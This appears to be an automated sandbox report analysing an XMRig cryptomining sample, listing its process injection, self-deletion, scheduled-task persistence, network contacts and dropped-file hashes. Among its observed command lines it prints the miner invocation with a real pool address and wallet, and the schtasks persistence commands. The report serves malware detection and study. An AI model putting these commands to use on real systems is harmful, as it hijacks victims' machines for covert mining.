Malware Analysis Report

2025-04-14 01:00

Sample ID 240603-kmdtcahd3s
Target 91290227566049adfd31ecd4c1296b92_JaffaCakes118
SHA256 3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6
Tags
xmrig miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6

Threat Level: Known bad

The file 91290227566049adfd31ecd4c1296b92_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig miner upx

xmrig

XMRig Miner payload

Loads dropped DLL

UPX packed file

Checks computer location settings

Deletes itself

Executes dropped EXE

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 08:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 08:42

Reported

2024-06-03 08:45

Platform

win7-20240221-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\scvhots.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1936 set thread context of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2632 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2632 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2632 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2632 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2256 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2632 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 2632 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 2632 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 2632 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 2632 wrote to memory of 2456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2632 wrote to memory of 2456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2632 wrote to memory of 2456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2632 wrote to memory of 2456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2492 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Users\Admin\scvhots.exe
PID 2492 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Users\Admin\scvhots.exe
PID 2492 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Users\Admin\scvhots.exe
PID 2492 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Users\Admin\scvhots.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1936 wrote to memory of 920 N/A C:\Users\Admin\scvhots.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat" "

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /delete /tn "Maintenance" /f

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml"

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3 /nobreak

C:\Users\Admin\scvhots.exe

"C:\Users\Admin\scvhots.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe -a cryptonight -o pool.supportxmr.com:80 -u 453ys3CV57Nbg2XCekHZdJRHyGd4uSB1oTuWEs5btLfsYDKE71XAmUVYybZXVBeZDS34zWxkWL6pNRNPPXHChq6CGwNa5j4 -p cpu --av=0 -t 1 --donate-level=1

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.supportxmr.com udp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.195:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.195:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.71:80 pool.supportxmr.com tcp
CH 141.94.96.144:80 pool.supportxmr.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat

MD5 98228d10daef5f91cccf5e0fb25f130e
SHA1 f94ed868eaee3015706b274d7a30f0c7086dc215
SHA256 d0d065878458a486bb9b453884cce4f0e13b83950f374cb765e2bbc9610995ff
SHA512 97eaf08ae5765f90734c762ddd77a196ca86a73f0660c4e8b7970e202487a471196d7ed186ab60b79dffc90d23ef3fa1ea3e44e515f22fe34a965cab09fc95d3

C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat

MD5 a8392a9f77078d7955410a1bf5fa9a82
SHA1 8963744692735559bce6322dcdb9a5f67fd952ba
SHA256 eff1ea1ce1e42d01c25fa203cb2f43316602d2cf51b88ef60ebd6679e57ddb11
SHA512 8dd07d99cafbe2bce9402f5eae33bf46e4b1f93b73b5815b5957f444be8c851f27e1143ef7923e86c6b4059f3ba4af8bd1bd37f625cad8c6005c12f75f708777

C:\Users\Admin\AppData\Local\Temp\ze20246384251130.tmp

MD5 f4cdf35f34063c1b0377008ae133e79f
SHA1 935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
SHA256 317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
SHA512 7c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f

C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml

MD5 bae07d90cc9071ee0f4d37b3f89d6a57
SHA1 90b6121e67985028c970bb3b5553324a4f9f611d
SHA256 742b5a10cb78290d18a962a81436a61d4d5124e748a5c59681684a924d6545d8
SHA512 9a5a143b91cecdda0e2924c467b30b856b0ae501f5c67746ea9c2b60b40666bbe9d101b806740489f2ba92da7a0165fbb44e536c6aedf6002406f506a3c4d9a8

memory/2632-25-0x0000000001F10000-0x00000000020FD000-memory.dmp

memory/2492-26-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2492-27-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/2492-29-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2492-28-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2492-34-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/2492-33-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/2492-31-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/2492-32-0x0000000075730000-0x0000000075777000-memory.dmp

memory/2492-35-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-36-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-38-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/2492-39-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-41-0x0000000075500000-0x000000007558F000-memory.dmp

memory/2492-42-0x0000000072230000-0x0000000072325000-memory.dmp

memory/1936-57-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/1936-53-0x00000000002C0000-0x00000000002C1000-memory.dmp

memory/1936-59-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-66-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/1936-58-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/1936-56-0x0000000075730000-0x0000000075777000-memory.dmp

memory/1936-55-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/1936-60-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-69-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-78-0x0000000075500000-0x000000007558F000-memory.dmp

memory/2492-77-0x0000000072230000-0x0000000072325000-memory.dmp

memory/2492-76-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-75-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/2492-74-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-73-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/2492-72-0x0000000074DF0000-0x0000000074E6D000-memory.dmp

memory/2492-71-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/1936-70-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-64-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/2492-62-0x0000000075730000-0x0000000075777000-memory.dmp

memory/2492-61-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-68-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/1936-52-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-51-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-50-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/2492-49-0x0000000004D30000-0x0000000004F1D000-memory.dmp

memory/1936-85-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/1936-83-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/1936-81-0x0000000075730000-0x0000000075777000-memory.dmp

memory/1936-80-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-86-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/920-93-0x0000000000400000-0x000000000057C000-memory.dmp

memory/1936-92-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/1936-90-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/1936-91-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/1936-89-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/1936-88-0x0000000074DF0000-0x0000000074E6D000-memory.dmp

memory/1936-87-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/920-79-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-94-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 08:42

Reported

2024-06-03 08:45

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1876 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 860 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3508 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3508 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3508 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3508 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 3508 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 3508 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 3508 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3508 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3508 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 800 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe
PID 800 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384248362.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384248362.bat" "

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /delete /tn "Maintenance" /f

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384248362.xml"

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3 /nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2524 -ip 2524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 372

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 227.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
NL 23.62.61.168:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 168.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
CA 51.222.12.201:14444 xmr-us-east1.nanopool.org tcp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
CA 51.79.71.77:14444 xmr-us-east1.nanopool.org tcp
US 8.8.8.8:53 201.12.222.51.in-addr.arpa udp
US 8.8.8.8:53 77.71.79.51.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 88.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\zbe20246384248362.bat

MD5 c52a50ad7723919bc4970694f3fa659f
SHA1 d828056bf36ae0c035e5e6ae9bb9beeb0d8f1471
SHA256 c63a9d286b483741055a5628a0cb2a5893e00a7cca874a954bbf0da54039179b
SHA512 a5026aa0c4888900c45fe5ed02600fc80e98b5603a461ac8ebde420e9b4a9381cbe5bde7c34dc665ce28ab80b423d1da6b60166c1a9651a1bb01c9f5314afc27

C:\Users\Admin\AppData\Local\Temp\zb20246384248362.bat

MD5 bce7e5428337ca3a72e55dafb75179d1
SHA1 7a582edb0e6533cd5b11da4aa777aa78aa788b5c
SHA256 f02aa457ed3471f91640da8ee62fa506440ba6abe043418b29781219312a84ba
SHA512 946abd5d35a0f62c85d7e8464148cd537fbf7b2b69e7d558afba65a8c778fb034cccd08620643895bfbb7c5ccc99242a858799195180321ae6741b4bfdc258e2

C:\Users\Admin\AppData\Local\Temp\zx20246384248362.xml

MD5 209f5fcd60089042d85b45f770eb07e2
SHA1 cb245161cc2204192107c7c84ab5aca01c007a5f
SHA256 d213081cc799b3d17c8aea6855744e90a0f82be1a4f4ac4b079919366ca78d97
SHA512 797fa36bee51a1745c5f7bb4561c120d1f293cbf897a573589697752e155ff7c896ae3746197cc036cee4ebb1cc749dc930c6b68b4f2a9d3ad011262c06942ca

C:\Users\Admin\AppData\Local\Temp\ze20246384248362.tmp

MD5 f4cdf35f34063c1b0377008ae133e79f
SHA1 935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
SHA256 317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
SHA512 7c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f

memory/2524-15-0x0000000000402000-0x00000000005CE000-memory.dmp

memory/2524-18-0x0000000000730000-0x0000000000731000-memory.dmp

